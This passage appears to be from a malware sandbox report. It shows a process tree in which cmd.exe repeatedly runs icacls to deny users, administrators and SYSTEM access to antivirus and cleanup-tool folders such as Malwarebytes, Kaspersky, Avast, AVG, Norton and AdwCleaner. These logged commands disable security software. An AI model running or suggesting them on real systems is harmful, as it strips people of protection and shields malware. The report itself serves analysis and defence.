                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1708
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                            PID:5580
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4928
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:1156
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:6040
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                PID:2408
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:1840
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:1716
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:3168
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:2916
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2448
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        PID:1684
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:1772
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                          icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:4764
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:2088
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                            icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                            PID:2112
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4052
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                              icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                              PID:3912
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3068
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                PID:1628
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                              PID:696
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                PID:1948
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                              PID:3624
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                PID:1588
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:2124
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                  icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                  PID:1428
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:2808
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                    PID:4540
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:328
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                      PID:5624
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                    PID:1708
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                      PID:548
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:4556
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                        PID:2236
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:2576
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                          icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                          PID:4280
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:3224
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                            PID:3680
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:1592
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                              PID:1820
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:5268
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                PID:5860
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:3640
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                  PID:2196
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:4208
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                    PID:4536
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:2464
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                      PID:2140
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                    PID:5216
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                      PID:5452
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:2432
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                        PID:6040
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                      PID:2936
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                        PID:2416
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:4032
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                          icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                          PID:2448
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:2004
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                            PID:3256
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:1644
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:5644
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                PID:1968
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:3068
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                  icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                  PID:2112
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:5972
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                    PID:4732
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:5280
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                      PID:5504
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:948
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                        PID:3168
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:2036
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                          PID:1968
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:2008
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                            PID:4260
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:1408
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                              PID:1708
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                            PID:4732
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                              PID:1528
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:4008
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                PID:792
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:2416
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                  PID:1772
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                    PID:2140
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
